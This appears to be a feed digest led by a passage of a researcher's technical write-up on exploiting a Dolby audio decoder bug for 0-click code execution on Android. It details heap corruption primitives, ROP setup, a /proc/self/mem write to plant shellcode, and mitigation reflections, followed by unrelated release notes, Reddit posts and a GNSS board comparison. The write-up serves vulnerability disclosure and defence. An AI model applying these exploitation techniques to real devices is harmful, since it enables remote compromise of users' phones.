payload_extraas well, and the corruption that occurred while gaining PC control did not provide adequate control of the values overwritingpayload_extrato perform the steps above. Remember, the heap length was overwritten by audio data in the dynamic buffer that happened to be written at an address soon after the static buffers’s scudo heap header, andpayload_extrawas overwritten by a pointer. For just extending the heap length, setting the value to ‘random garbage’ was enough, but for multiple overwrites viapayload_extra, a specific value is needed.A simple solution would be to use WRITE DYNAMIC to write the data after the heap header to the needed value, but this isn’t possible, because this address is written by the decoder while decoding a portion of the audio blocks called bit allocation pointers (baps), between when attacker-controlled data is written and when it is processed by the next syncframe. So even if the needed values are written with WRITE DYNAMIC, they are overwritten before they can be used to set
payload_extraand nearby fields. I tried stopping the write from happening by including erroneous data in the syncframe that prevented baps from being written, but this also stopped EMDF data from being processed. I also tried altering an audio block to write controlled data in this location, but the possible values of baps are fairly limited, only low 16-bit integers.I eventually wondered if it would be possible to get the scudo heap to write an ‘inactive’ header, i.e. one that contains pointer values, but isn’t currently in use. I experimented with scudo, and discovered that if a secondary chunk is the first one of that size ever allocated by a process (like the dynamic buffer is), its previous pointer will point to itself, and if the previous pointer is partially overwritten (for example, so the last two bytes are 0x5000 instead of 0x3000), the next time the chunk is allocated, the address returned by the allocator will be at the 0x5000 address, but the scudo header at 0x3000 will not be cleared. This only works because the dynamic buffer is the only buffer anywhere near its size that is allocated by the process, otherwise, there would be a risk that this buffer would be allocated again, leading to memory corruption that could cause a crash before the exploit is finished running.
Since the decoder needs to be reset to cause the dynamic buffer to be reallocated, implementing this required adding a third media file to the exploit, but this isn’t a big cost in a fully-remote exploit, as three attachments can easily be added to the same SMS or RCS message. Now the exploit has three files:
- first.mp4 -- Using WRITE DYNAMIC, writes
dynamic_base + 0x3061to 0x48, causing the dynamic buffer to be reallocated atdynamic_base + 0x4800when second.mp4 is loaded - second.mp4 -- Using WRITE DYNAMIC, writes
dynamic_base + 0x4861to 0x50, causing the dynamic buffer to be reallocated atdynamic_base + 0x5000when third.mp4 is loaded - third.mp4 -- contains the rest of the exploit
Note that
dynamic_baseis the location of the dynamic buffer with the lower two bytes cleared, i.e.dynamic_buffer && 0xFFFFFFFFFFFF0000When the ASLR state needed for the exploit to work is correct, the dynamic buffer is atdynamic_base + 0x3000.Now, there is a scudo heap header at
dynamic_base + 0x4800that is not actively in use and does not get overwritten by baps that can be used to create an EMDF container that will overwritepayload_extra. But there is one problem. I explained earlier that, when filling a buffer using DYNAMIC WRITE, the exploit needs to perform overlapping writes downwards, because the next EMDF container, which is needed to move the skip pointer for the next step, overwrites some data at the start of the write. This doesn’t matter when writing a long page of data, because the next write can fix the previous one, but it does in this case. The layout of the heap header is as follows:I needed to write specific data to exactly offset 0xc8, but couldn’t corrupt the ‘prev chunk ptr’ because it was needed to overwrite the skip pointer during the copy. There’s 0x60 bytes between these, which is not enough for a payload that moves the skip pointer.
So I needed a new primitive. Thankfully, the way the decoder handles the EMDF syncword provides this. Basically, once skip data is copied into the skip buffer, the buffer is searched for the syncword (‘X8’), and EMDF container parsing starts after the syncword. So it is possible to put some data before the syncword, and that gets written to the skip pointer, then put the container that moves the skip pointer after that. This allows the data to be written to the skip pointer, and then then skip pointer to be moved in a single syncframe, so that data doesn’t get corrupted by a future skip pointer write. I will call this primitive WRITE DYNAMIC FAST. There’s two downsides of this primitive compared to WRITE DYNAMIC. One is that since the EMDF container that moves the skip pointer and the data written are in the same syncframe, a smaller amount of data can be written. The other is that it is more difficult to debug. In a WRITE DYNAMIC syncframe, the address written to is always at the same offset, so it is easy to visually inspect many syncframes and determine where they are writing, but this is not the case with WRITE DYNAMIC FAST. So, my exploit uses WRITE DYNAMIC wherever possible, and only uses WRITE DYNAMIC FAST for writes that can’t be accomplished with WRITE DYNAMIC.
With this primitive, I could create a syncframe that overwrites the skip pointer with a valid pointer to the dynamic buffer, then overwrites the heap length and
payload_extra. This created a new primitive, which I will call WRITE STATIC. This allows a write to any offset in the static buffer larger than 0x63c30 relative to the static buffer’s base!Calling Controllable Functions
Now that I had the ability to perform multiple writes to the static buffer, it was time to figure out a path to shellcode execution. This required analyzing how the function pointers in the static buffer are called. It happens in the following function:
void* DLB_CLqmf_analysisL(void **static_buffer, __int64 *output_index, __int64 in_param) { //static_buffer is static buffer at offset 0x8a3c8 … int loop_times = *(int*)static_buffer + 5); int index = *(_DWORD *)static_buffer; do { index_val = *output_index++; param_X0 = static_buffer[12]; param_val = param_X0 + 8 * index; (static_buffer[14])( param_X0, static_buffer[5], static_buffer[1], static_buffer[7], in_param); result = dlb_forwardModulationComplex( param_X0, index_val, param_val, *static_buffer, static_buffer[13], static_buffer[8], static_buffer[9]); index = *(unsigned int *)static_buffer; --loop_times; … } while ( loop_times ); return result; }The function
dlb_forwardModulationComplexcontains the following condition:if ( a7 ) { result = (__int64 (__fastcall *)(__int64, __int64, _QWORD))(*a7)(a3, a1, a4); }This function’s behavior is extremely promising with regards to exploitation. It reads a function pointer and parameters out of memory that can be written with WRITE STATIC, then calls the function pointer with those parameters. There is also an option to make an indirect function call using
dlb_forwardModulationComplex, if there happens to be a situation where a pointer to a function pointer is available instead of the function pointer itself. Finally, the call is repeated a specific number of times, based on a controllable value read out of the static buffer. CombiningDLB_CLqmf_analysisLwith WRITE STATIC, I could partially overwrite function pointers to run ROP with controllable parameters.What’s the plan, (Seth and) Jann?
As I developed this exploit, Jann Horn asked several times how I was planning to get from ROP to code execution in the
mediacodeccontext, as Android has several security features intended to make this step difficult. I put this off as a ‘future problem’, but now was at a point where this needed to be solved.Normally, my strategy would be to write a shared library to the filesystem, then call
dlopenon it. Or write shellcode to a buffer and call amprotectwith ROP to make it executable. SELinux prevented both of these. It turns out the mediacodec SELinux context does not have any allow rule that allows it to open and write the same file, sodlopenwas a non-starter. Additionally, mediacodec does not have execmem permissions, so making memory executable was also out. Making matters worse,libcodec2_soft_ddpdec.somakes limited calls to libc. So not very many functions were available for ROP purposes. For example, the library importsfopenandfread, but notfwriteorfseek.Eventually, I got together with Jann Horn and Seth Jenkins to figure out a strategy to get from ROP to arbitrary instruction execution. Jann had the idea to write to
/proc/self/memThis ProcFS file allows for any memory in a process to be overwritten for debugging purposes (i.e. to support software breakpoints), and could potentially be used to overwrite a function, and then execute it.After investigating the
mediacodeccontext’s permissions, we came up with the following strategy:-
Map shellcode into memory using WRITE DYNAMIC
-
Call
fopenon/proc/self/memmany times, so a file descriptor number associated with/proc/self/memcan be easily guessed -
Call
pwriteto write the shellcode to a function that can later be executed. (Note thatpwriteis not imported bylibcodec2_soft_ddpdec.so, but nothing else that can write to a file handle is either).
Translating this sequence into ROP calls made by WRITE STATIC was more difficult than expected. One problem was that partially overwriting the function pointers in
DLB_CLqmf_analysisLprovided less functionality than I’d imagined. If you recall,DLB_CLqmf_analysisLmakes two function calls that can be overwritten. The first is a direct call toanalysisPolyphaseFiltering_P4at 0x26BDEC (note this isn’t symbolized in the Android version of the library). The second is an indirect call toDLB_r8_fft_64via a pointer at offset 0x2A7B60.The upper nibble of the second byte of where these functions are loaded is randomized by ASLR on Android. I tested this, and saw the behavior below, which is fairly uniform.
So my only options were to use ROP gadgets that involve only overwriting the first byte of the function pointers, or add additional unreliability to the exploit. The available gadgets weren’t promising, so I decided to just guess this offset in my exploit, which adds another 1/16 probability, meaning the exploit will work one out of 256 times total. Considering the decoder process takes three seconds to respawn, this means the exploit would take on average around six minutes to succeed, which isn’t prohibitive.
Guessing this nibble expands the available ROP gadgets to a span of 0xFFFF bytes, and it’s possible to shift this span somewhat, depending on what value the exploit guesses this nibble to be. Still, this is only about 5% of the 1.3 MB of code in
libcodec2_soft_ddpdec.so. For the indirect call, 0xFFFF spans almost the entire export table, as well as the global offset table (GOT), so there’s some options there, but the library exports only about 40 functions from libc.But it wasn’t hopeless. For one, it is possible to call
memcpywith these limitations, and if the parameters are unmodified,dstis a location in the dynamic buffer, andsrcis a location in the static buffer. Also, there was a promising ROP gadget in the accessible range:0x000000000026ae38 : ldr w8, [x1] add w8, w8, #0x157 str w8, [x1] retI will call this the “increment gadget”.
With this, I had a plan:
-
Change the indirect call to the
fopenpointer in the GOT, and call it several times on/proc/self/mem -
Change the indirect call to
memcpy, and copy thefopenGOT entry to the dynamic buffer -
Set the
dstparameter ofmemcpyto the location of the GOT pointer in the dynamic buffer and call it again, causing a pointer to thefopenfunction in libc to be copied to the dynamic buffer -
Use DYNAMIC WRITE to overwrite the last byte of the function pointer, so the distance between the pointer and
pwriteis a multiple of 0x157 -
Call the increment gadget over and over to increment the function pointer in the dynamic buffer by 0x157 until its value is
pwrite -
Call
pwrite -
Profit?
This plan obviously glosses over a lot, most of which will be explained in the next section, but it is the plan I wrote up at the time.
One immediate question is “does the math work”? It seems to. In the version of the library I looked at,
fopenis at 0x92E90 andpwriteis 0xDD6C0. A one- byte overwrite could change afopenpointer to 0x92E4A, then:0x157 × 890 + 0x92E4A = 0xDD6C0Another question is whether this math would work generally, even on devices that have libc compiled with different offsets. I believe it would. In each version of libc, there are at least four call locations that will end up calling
pwrite:pwrite,pwrite’s PLT,pwrite64andpwrite64’s PLT. If those don’t work, there’s combinations ofseekandwriteorfseekandfwrite. Worst case, the exploit could change the GOT entry that’s read, so the math starts with a different function pointer thanfopen. There are a very large number of possibilities and more than one is likely to work on every libc compilation.The Exploit
Now, it was time to write the third file of the exploit. This turned out to be fairly complicated, with some unexpected problems. In order to explain these, this section will go through the third file of the exploit, one syncframe at a time. You can follow along here. Note that filenames that begin with numbers, for example,
10_write_x0contain the actual syncframe data for that syncframe, meanwhile files with names likemake_10_write_x0.pycontain Python that generates the frame, often created with Gemini. Files with no corresponding Python were either handforged or exact copies of previous syncframes. Files appended with the suffix_specialwere generated with the corresponding Python, then altered by hand. The syncframes can be combined into a single MP4 file with correct checksums by runningcombine_frames.py.longmem
The third exploit MP4 starts with the 36 syncframes in the longmem directory, containing the shellcode that the exploit eventually runs. The shellcode is copied to the dynamic buffer at descending addresses using DYNAMIC WRITE. As the exploit progresses, it performs actions that break DYNAMIC WRITE, so it’s easiest to get this into memory now.
1_adjust_write_heap
This syncframe sets the skip pointer to
dynamic_base + 0xF000.2_adjust_write_heap_special
This syncframe uses DYNAMIC WRITE FAST to write ‘wb’ and “
/self/proc/mem” to the address above, so they are available as parameters for a futurefopencall, then moves the skip pointer todynamic_base + 0xD000, so they aren’t immediately corrupted.3_adjust_write_heap
This syncframe sets the skip pointer to
dynamic_base + 0x48c8, an offset that will correspond to the evo heap length andpayload_extraonce the memory is copied. (In hindsight, this could have been done in the previous frame, but too late now.)4_adjust_write_heap_special
This synframe uses DYNAMIC WRITE FAST to write the memory at the offset corresponding to the evo heap length to 0xFFFFFFFFFFFFFFFF and the offset corresponding to
payload_extrato 0x28530. It then sets the skip pointer todynamic_base + 0x473a.5_do_heap_write
This syncframe writes the start of an EMDF container to the address set in the previous frame, so that the data written by
3_adjust_write_heap,4_adjust_write_heap_specialand this syncframe together form a valid EMDF container, which is then parsed, triggering the bug and setting the heap length to 0xFFFFFFFFFFFFFFFF andpayload_extrato 0x28530. This makes the WRITE STATIC primitive available, but also makes WRITE DYNAMIC and DYNAMIC WRITE FAST no longer function, as evo heap allocations no longer take up the same amount of space on the heap.6_write_pc
To understand this and future syncframes, it’s important to understand the functionality of WRITE STATIC in a bit more detail. The memory this primitive can write, which is eventually the X0 parameter to
DLB_CLqmf_analysisLis laid out as follows:The function pointer for the direct call is available to be overwritten, as are its parameters, ARM64 registers X0 through X3. The indirect function parameters are also calculated from values in this structure, which I will explain in more detail later.
Each 64-bit slot can be considered an ‘entry’ that needs to be individually overwritten in order to do non-contiguous partial overwrites. WRITE STATIC can alter a single entry per syncframe. Unfortunately,
DLB_CLqmf_analysisLalso executes once per syncframe, which can cause crashes or undesired behavior if the exploit is in the process of setting parameters when the call occurs.This syncframe sets
direct_call_fptrat entry 14 to a gadget that contains only the instructionret, by doing a partial overwrite of the existing pointer. This prevents the direct function call from causing unexpected behavior.7_garbage
Executing any frame with a valid EMDF header caused a crash after the previous frame, due to an out-of-bounds
memset. Based on its parameters, this call is obviously intended to zero the evo heap, but since the heap length is now larger than the static buffer, it writes out of bounds. I performed a minimal analysis of what triggers this call and discovered that it requires processing two syncframes containing EMDF containers in a row, so I added in a syncframe that contains random invalid data to reset this. This ‘garbage’ syncframe is now required after every valid syncframe to avoid crashes. I will omit it as I continue through the exploit, but note that every future frame is even- numbered, because all the odd-numbered frames are ‘garbage’.8_write_str_str
Similar to syncframe 6, it is necessary to overwrite the indirect function pointer at entry 9 to avoid crashes as parameters are set, however, it is not possible to use ROP, as the entry needs to be set to a pointer to a function pointer. This syncframe sets entry 9 to the GOT entry pointing to
strstrby doing a partial overwrite. While this isn’t ideal, for the time being,X0andX1of the indirect call will always be pointers, andstrstrdoesn’t modify any memory, so running it repeatedly won’t cause crashes or other problems.10_write_x0
This syncframe prepares the X0 parameter for the indirect call to
fopen. For this call, X0’s value will be the pointer at entry 12 (direct_call_X0)plus an offset calculated from entry 0 (index). The entire calculation is:indirect_call_x0 = direct_call_X0 + 8 * index;In syncframe 1, “
/proc/self/mem” was already loaded into the dynamic buffer, and this syncframe setsindexto 1, so X0 references this string, 8 bytes away from the string ‘wb’.12_write_x1
This syncframe partially overwrites entry 10, which is currently a pointer to the dynamic buffer so that its value is
dynamic_base + 0xF000, making it point to the string ‘wb’.14_write_fopen
This syncframe partially overwrites entry 9, so the indirect function pointer now references
fopen.fopenwill immediately be called four times, the default value ofloop_count.16_garbage to 23_garbage
The exploit now processes a few garbage syncframes to run
fopenrepeatedly to ‘spray’ the file handle so it can be guessed. This works because the UDC process opens very few files, so the handles are predictable over a certain number.24_write_str_str
Returns entry 9 (the indirect function pointer) to
strstr, sofopenstops being called.26_write_x2
This syncframe sets
direct_call_X2(entry 1) to 0xb8 in preparation for a call tomemcpy.28_write_x0
This syncframe partially overwrites the dynamic buffer pointer in
direct_call_X0(entry 12) todynamic_base + 0xEC00, in preparation for a call tomemcpy.30_loop_count
This syncframe sets the
loop_countin entry 2 to 1, so future function calls do not execute multiple times per sycframe.32_memcpy
This syncframe sets the direct function pointer (entry 14) to a
memcpygadget at 0x26cc2c, which is then called, causing the static buffer to be copied to the dynamic buffer, including an indirect pointer tostrstr, set at entry 9 above. Note that the copy will occur every syncframe until entry 14 is overwritten again.34_write_x0
The previously-set value of direct_call_X0 was a dummy value, to keep the copy away from skip buffer while the previous, especially large, EMDF container was being processed. This syncframe sets it to the actual copy destination, dynamic_base + 0x5F83.
36_zero_page and 38_copy_x1_special
The next two syncframes copy the newly written
strstrGOT entry pointer todirect_call_X1using the leak capability of the vulnerability, so it can be thesrcparameter of the next memcpy.36_zero_pagewrites zeros, followed by the end of an EMDF container to the skip pointer.The
memcpythen occurs, copying the GOT pointer into the middle of the EMDF container.38_copy_x1_specialwrites the head of the EMDF container to the skip pointer, then the container is parsed, causingdirect_call_X1(entry 5) to be set to the GOT pointer.40_write_x0 and 42_write_x0
Syncframe 40 sets
direct_call_X0(entry 12) todynamic_base + 0xEF00.memcpyis then called, causing a direct pointer tostrstrto be copied to that address. Syncframe 42 sets it todynamic_base + 0x6043, so the copied memory doesn’t get corrupted, and to set up the nextmemcpycall.44_write_x2, 46_write_scf, 48_zero_page and 50_write_x3_special
Though it wasn’t strictly necessary at this point, I wanted to set
direct_call_X3tostrstr, so it would be available asoffset, the fourth parameter to the eventualpwritecall. This made sense because the pointer was currently available in the dynamic buffer, and all other direct calls needed by the exploit had fewer than four parameters. Flash forward to the future: this was a bad idea.The
offsetparameter specifies the locationpwritewrites to, which for/proc/self/memin this exploit is the address of a function that will be overwritten with shellcode.strstrseemed perfect, because I could already make controlled calls to it, and it otherwise doesn’t get called a lot, but when I ran the finished exploit, it didn’t work, becausegetpid,munlockand several other frequently-called functions were located immediately after it in libc. They usually got called first, causing the exploit to jump into the middle of the shellcode.It was easiest just to use
memcpyto copy a different function pointer, and after some testing, I selected__stack_chk_fail, as it doesn’t get called during normal operation and the functions after it in libc aren’t used by the UDC either. So this combination of syncframes uses the same trick as was used to copy thestrstrGOT intodirect_call_X1to copy a pointer to__stack_chk_failintodirect_call_X3. Note that this only takes one ‘round’ of using the leak capability to copy a pointer, versus two forstrstr, because I was able to partially overwrite the pointer to thestrstrGOT entry indirect_call_X1to so it pointed to the__stack_chk_failGOT entry, so didn’t need to copy the static buffer a second time.52_set_pc_back
This syncframe sets the direct function call back to the ret gadget, so it stops calling
memcpy.54_write_skip, 56_write_x1_end_special and 58_write_x1_start_special
When starting this exploit, I genuinely believed it would be possible to get shellcode execution without WRITE DYNAMIC once WRITE STATIC was unlocked. This turned out to be wrong. In the plan I wrote up for the exploit, I missed the fact that
direct_call_X1was set to the GOT at this point in the exploit, but needed to be set to the dynamic buffer.Some nice pointers to the dynamic buffer were already in the dynamic buffer from when I had copied the static buffer there to get the address of the GOT, and I could use the same trick to copy one to
direct_call_X1that I’d used to copy the other pointers, but I’d need to move and write to the skip pointer to their address. I decided at this point the easiest path forward would be to regain the WRITE DYNAMIC primitive.This was really just a math problem: the original WRITE DYNAMIC primitive would allocate a lot of EMDF payloads to exhaust the heap, then trigger the buffer overwrite capability to alter the skip pointer, meanwhile, with
payload_extraoverwritten, this would fail due to an integer overflow check failing when it is added to the payload size. But it’s not actually necessary to trigger the vulnerability once the heap length is overwritten, as the evo heap no longer accurately checks whether heap writes are out of bounds.As a refresher, the evo heap is laid out as follows:
The new WRITE DYNAMIC allocates the perfect number of payloads so that the allocation size of the pointer array plus the payload structs is exactly even with the skip pointer, and then the first payload’s data overlaps with the pointer, and can be used to overwrite it.
These syncframes use a series of WRITE DYNAMIC and WRITE DYNAMIC FAST calls to set
direct_call_X1to the dynamic buffer.60_write_skip, 62_write_single_byte and 64_move_skip
The first two syncframes use DYNAMIC WRITE to overwrite the final byte of the pointer to
strstr, so it is a multiple of 0x157 away frompwrite. The final syncframe moves the skip pointer to another address so it doesn’t write the byte a second time.66_write_index
The exploit is about to call the increment gadget a large number of times, which will also increment the variable index at entry 0 in
DLB_CLqmf_analysisL. This syncframe sets its value to zero, so that these future increments don’t lead to reads out of bounds.68_loop_count
This syncframe sets the loop_count in entry 2 to 0x7B, so that the increment gadget runs the correct number of times. Note that
DLB_CLqmf_analysisLwill run twice, causing the gadget to run 0xF6 times.70_write_x1
direct_call_X1currently points somewhere in the dynamic buffer. This syncframe makes it point exactly to the modified pointer tostrstr.72_inc_157
This syncframe sets the direct function pointer to the increment gadget, which is then called 0xf6 times, causing the function pointer in the dynamic buffer to point to
pwrite.74_set_pc_back
Sets the direct call pointer back to the ret gadget, so incrementing stops.
76_set_malloc
The indirect function pointer is currently set to
strstr. This will become a problem as its parameters are prepared for callingpwrite, aspwrite‘s first parameter is a file handle (i.e. an integer), which will crash as the first parameter ofstrstr. This syncframe sets the indirect function pointer tomalloc, as its GOT entry is within range and the call will succeed with a single integer parameter.78_write_x0
This syncframe writes
direct_call_X0with 40, the estimated handle to/proc/self/mem.80_write_x1
This syncframe partially overwrites
direct_call_X1so it points to the shellcode in the dynamic buffer.82_write_x2
This syncframe writes
direct_call_X2with the integer length of the shellcode.84_write_end_special and 86_write_start_special
These syncframes copy the pointer to
pwriteto the direct_call_fptr (entry 14), using the same method as other pointer copies from the dynamic buffer.pwriteis immediately called, overwriting__stack_chk_failwith the shellcode.88_write_scf
This syncframe partially overwrites the indirect call register, so it points to the GOT entry for
_stack_chk_fail.__stack_chk_failimmediately executes, running the shellcode!How reliable is this exploit?
Due to ASLR guessing, this exploit works roughly 1 in 255 times. There is one other source of unreliability. Occasionally, binder performs a secondary allocation while the exploit is running, in which case, header checks fail and it crashes. This happens a lot when the debugger is attached, but I observed it less than 10% of the time when the process is running normally.
Another question is whether the exploit could be made more reliable. I have two ideas in this regard, both which would require substantial development effort.
To remove the 1/16 probability when guessing the dynamic buffer location, it might be possible to overwrite the second lowest byte of the prev pointer in the dynamic buffer allocation before exploitation starts. As discussed previously, this causes the buffer to be reallocated at that address, so this would have the end result of moving the allocation to a consistent offset from the
dynamic_basebefore the exploit runs.The challenge here would be to find a way to write to the header of the dynamic buffer while only overwriting the lowest byte of the pointer, as this is the only byte that can be overwritten without knowing the ASLR bits. One possibility is using the bap write feature of the decoder, as it writes data close to the skip pointer, but very limited data can be written. The
evod_processfunction also writes to low addresses of the skip buffer after the EMDF container is parsed, so it might be possible to use this write as well.This strategy would not make determining the dynamic buffer allocation 100% reliable, because the location where the dynamic buffer is reallocated needs to be mapped. For example, if an allocation at
dynamic_base + 0x3000has its prev pointer overwritten to bedynamic_base + 0xF000, it will be shifted to that address, but if an allocation atdynamic_base + 0xF000is overwritten to bedynamic_base + 0x3000, it will crash when scudo attempts to write a heap header to the lower address, because that memory is not mapped. Overwriting the prev pointer todynamic_base + 0xF000would theoretically always work, but that would limit DYNAMIC WRITE to addresses betweendynamic_base + 0xF000anddynamic_base + 0xFFFF, because the primitive can only overwrite bytes in the address it writes to, it cannot increment the third lowest byte to extend this range. So this strategy would require reducing the amount of memory in the dynamic buffer that the exploit needs, but if that’s possible, it could potentially remove the unreliability caused by the second nibble randomization of the dynamic buffer.To remove the 1/16 probability when guessing the load address of
libcodec2_soft_ddpdec.so, if it was possible to copy a pointer to the dynamic buffer, it would then be possible to use the second nibble of that pointer as theemdf_container_lengthof a syncframe. For most lengths, it’s then possible to craft an EMDF container that would not trigger the bug if the length is too short, because the bytes triggering the bug aren’t processed, and not trigger the bug if the length is too long (asevo_parse_payloadis called twice, triggering the bug on the second call, so an invalid payload occurs after the trigger, it prevents the trigger from running). Then, a series of syncframes that work with all 16 possible library offsets could be crafted, and only the correct ones would be processed.The real challenge here would be copying from the static buffer to the dynamic buffer without guessing the library location, as both the direct and indirect calls available are quite limited. But if this was possible, the unreliability due to not knowing the library load address could be avoided, at the cost of substantial development effort.
Overall, I suspect it’s possible to substantially improve the reliability of this exploit, though it would likely require several months more development effort.
Reflections on Mitigations
My progress writing this exploit was impeded by several Android platform mitigations, meanwhile others were not as effective as I expected, so I want to take this chance to reflect on what worked and can be improved.
ASLR was by far the most challenging mitigation to bypass, this exploit would have been substantially easier to write without it. Partially overwriting pointers to bypass ASLR is a common exploit strategy, and I was surprised by how much more difficult randomization of low bits of the pointer made it. While it’s also important that pointers have enough overall randomization that they can’t be guessed, my takeaway from this is that randomization at low address bits does a lot more to increase exploit development time than randomization at high bits.
I also performed a lot of testing of Android ASLR, and I did not find any areas that were not randomized enough to prevent exploitation. This has not always been true of Android in the past, and I was pleased to see that Android ASLR appears to be well implemented and tested.
SELinux also made exploitation more difficult, as a lot of ‘classic’ techniques for running shellcode didn’t work, and I was lucky to have access to experts like Seth and Jann who could help me understand the restrictions on the system and how to get around them. That said, that is likely a one-time cost for attackers: once they learn strategies for bypassing SELinux, they will work for multiple exploits.
The
mediacodeccontext usually has seccomp rules that prevent a process from executing syscalls that aren’t needed for its normal functionality. A policy is implemented in AOSP, and I tested that the Samsung S24 enforces this policy on its media decoding processes. However, this was somehow left out of the Pixel 9. A seccomp policy similar to Samsung’s would have prevented the call topwriteused by the exploit. This wouldn’t have prevented exploitation, as every syscall needed to access the BigWave vulnerability this exploit chains into must be callable by the decoder process for decoding to function correctly, but it likely would have forced the exploit to be written entirely in ROP, versus jumping to shellcode. This would have added at least a few more weeks of exploit development effort.Likewise, the accessibility of
/self/proc/memwas a big shortcut to exploitation. Since it is only used during debugging, I wonder if it is possible to implement some sort of mitigation that makes it inaccessible when a device is not being debugged.scudo also lacked mitigations that could have made this exploit much more difficult, or even impossible. It was surprisingly easy to modify secondary headers to ‘trick’ the allocator into moving an allocation, meanwhile, in the primary partition, this would have been prevented by checksums. While vulnerabilities that allow a scudo secondary header to be modified are fairly rare, as every scudo secondary allocation is preceded by a guard page, the performance cost of adding checksums to the secondary partition would likely be limited, as in most applications, there are far fewer secondary allocations compared to primary allocations.
It’s also important to note that part of why this vulnerability was exploitable in a 0-click context was because it is an exceptionally high quality bug. It contained both the ability to leak memory and to overwrite it, provided a high level of control over each and the structures that could be corrupted by the overwrite were unusually fortuitous. That said, the memory layout that enabled this isn’t unusual among media decoders. For example, the H264 decoder that I reported this 2022 vulnerability in has a similar layout, with large structs, and could potentially be prone to similar exploitation techniques involving overflows between struct members.
On Mac and iOS devices we tested, the UDC is compiled with -fbounds-safety, a compiler mitigation which injects bounds checks into a compiled binary, including the bounds of arrays within C structs. We believe CVE-2025-54957 is not exploitable on binaries compiled with this mitigation. While there is a performance cost, compiling all media libraries with this flag would greatly reduce the number of exploitable vulnerabilities of this type. Even in situations where this is not practical in production, testing and fuzzing media libraries with -fbounds-safety enabled could make it easier to find and fix this type of exceptionally exploitable vulnerability.
The Next Step
Now that we’ve gained code execution in the mediacodec context, it is time to escalate to kernel! Stay tuned for Part 2: Cracking the Sandbox with a Big Wave.
-
🔗 batrachianai/toad The Shelled Release release
[0.5.30] - 2026-01-14
Fixed
- Fixed Terminals not focusing on click
- Fixed tool calls not rendered
- Fixed Kimi run command
- Fixed permissions screen not dispaying if "kind" is not set
Added
- Added reporting of errors from acp initialize call
- Added Interrupt menu option to terminals
-
🔗 HexRaysSA/plugin-repository commits sync repo: +1 release rss
sync repo: +1 release ## New releases - [Sharingan](https://github.com/n0pex3/sharingan): 1.0.2 -
🔗 HappyIDA/HappyIDA v1.0.0 release
Full Changelog : https://github.com/HappyIDA/HappyIDA/commits/v1.0.0
-
🔗 HexRaysSA/plugin-repository commits fix typo rss
fix typo -
🔗 HexRaysSA/plugin-repository commits add arkup/tc_deer to known-repositories.txt rss
add arkup/tc_deer to known-repositories.txt -
🔗 HexRaysSA/plugin-repository commits sync repo: +1 plugin, +2 releases rss
sync repo: +1 plugin, +2 releases ## New plugins - [Sharingan](https://github.com/n0pex3/sharingan) (1.0.0) ## New releases - [ida-chat](https://github.com/HexRaysSA/ida-chat-plugin): 0.2.6 -
🔗 r/wiesbaden Hainerberg Taco Bell Menu rss
Not an advertisement, posted for informational purposes. The Taco Bell is on a US military base. You must have access to US installations or be accompanied by someone with access and pass a security check. I will not provide access to anyone. I might do a one time Taco Bell party off the base, if there is interest and someone is willing to host.
submitted by /u/OldBayExorcism
[link] [comments] -
🔗 r/reverseengineering Game Reverse Engineering - One Hit Kills Hack rss
submitted by /u/chaiandgiggles0
[link] [comments] -
🔗 HexRaysSA/plugin-repository commits sync repo: ~1 changed rss
sync repo: ~1 changed ## Changes - [ida-chat](https://github.com/HexRaysSA/ida-chat-plugin): - 0.2.1: archive contents changed, download URL changed -
🔗 SparkFun Tutorials What's the difference between the ZED-F9P and the ZED-X20P? rss
What's the difference between the ZED-F9P and the ZED-X20P? a
Available online at:
Introduction
The ZED-X20P is u-blox's GNSS receiver designed as a successor to the wildly popular ZED-X9P. It has improvements in accuracy, band reception, and power consumption. Here, we outline the key differences between our ZED-F9P and ZED-X20P breakout boards so you know exactly how to upgrade your projects to the newest technology.
Comparison of Features
u-blox provides the following table comparing key high-level differences between the features on the ZED-F9P and the ZED-X20P:
We've also compiled the differences between the chips across more specific features:
Parameter | ZED-F9P | ZED-X20P
---|---|---
PPS Accuracy | 30 ns | 20 ns
Convergence Time | < 10 s | < 7 s
Max Velocity | 500 m/s | 300 m/s
Velocity Accuracy | 0.05 m/s | 0.03 m/s
Backup Battery Current | 45 µA | 32 µA
SW Backup Current | 1400 µA (1.4 mA) | 93 µA
Peak Current | 130 mA | 80 mA
Acquisition Current | 95 mA | 68 mA
Tracking Current | 93 mA | 64 mA*Notes: u-blox has recently removed support for the GLONASS GNSS constellation. This is not accounted for in the listed current consumption of the ZED-X20P.
Hardware Changes
With the exclusions of the added JST connector and adjusted location of the BlueSMiRF header; the overall board dimensions, edge connectors and screw-hole locations, and PTH pin layout are exactly the same.
Allband GNSS RTK Breakout - ZED-X20P (Qwiic)
GPS-RTK-SMA Breakout - ZED-F9P (Qwiic)
GPS-RTK2 Board - ZED-F9P (Qwiic)



Antenna Connection
Connector Options
With the ZED-F9P we released two different boards with either a U.FL connector or an SMA connector to attach a GNSS antenna. With the ZED-X20P, we have released a single board with both options with a jumper to select the connector to be used.
SMA: The location of the SMA connector remains the same.
U.FL: The U.FL connector’s location is slightly different by a couple millimeters. There was a hole in the board to pass a U.FL cable through.
Notes: We did our best to maintain an impedance match between the two different connections. Users may experience a small shift in the signal’s impedance after altering their board. However, in our experience, the GNSS receiver was still functional after modifying the jumper and we didn’t really notice a degradation in performance.
Length of SMA Connector
We recently changed suppliers for our SMA connector, so users will eventually see a slightly longer SMA connector on future boards.


Old version: 6.3mm
New version: 8mm
BlueSMiRF Header Location
On the ZED-F9P boards, the BlueSMiRF PTH pins were located at the edge of the board. For the ZED-X20P, we have added a locking JST connector, in its place, to allow users to easily attach an RF transceiver. Therefore, the BlueSMiRF header was relocated to the interior of the board.
Notes: The pin layout of the BlueSMiRF header remains the same; connecting to the UART2 interface of the GNSS receiver. On the ZED-X20P, we added a VSEL jumper for users to switch between either a 5V or 3.3V input/output voltage for the BlueSMiRF header.
Pin Functionality
Most of the pin functionality remains the same, with the exception of a single pin. The safeboot pin on the ZED-Z20P board was relocated to a test point and replaced with the enable pin for the RT9080 LDO.


ZED-F9P: Safeboot Pin
ZED-X20P: RT9080 Enable Pin
Notes: The SPI interface is enabled with the DSEL jumper for the ZED-F9P; meanwhile, for the ZED-X20P, it is enabled with the SPI jumper. The operation of these jumpers remains the same; only the name changed on the silkscreen. Similarly, the EVENT and INT pins are both external interrupt pins; only the name changed on the silkscreen.
UART Interface
Baud rate:
- ZED-F9P: 9600-921600 bps
- ZED-X20P: 4800-8000000 bps
Notes: Default baud rate is 38400 bps. The ZED-F9P only supports the RTCM protocol up to v3.3
SPI Interface
Max transfer rate:
- ZED-F9P: 125 kB/s
- ZED-X20P: 880-950 kB/s
Max clock speed:
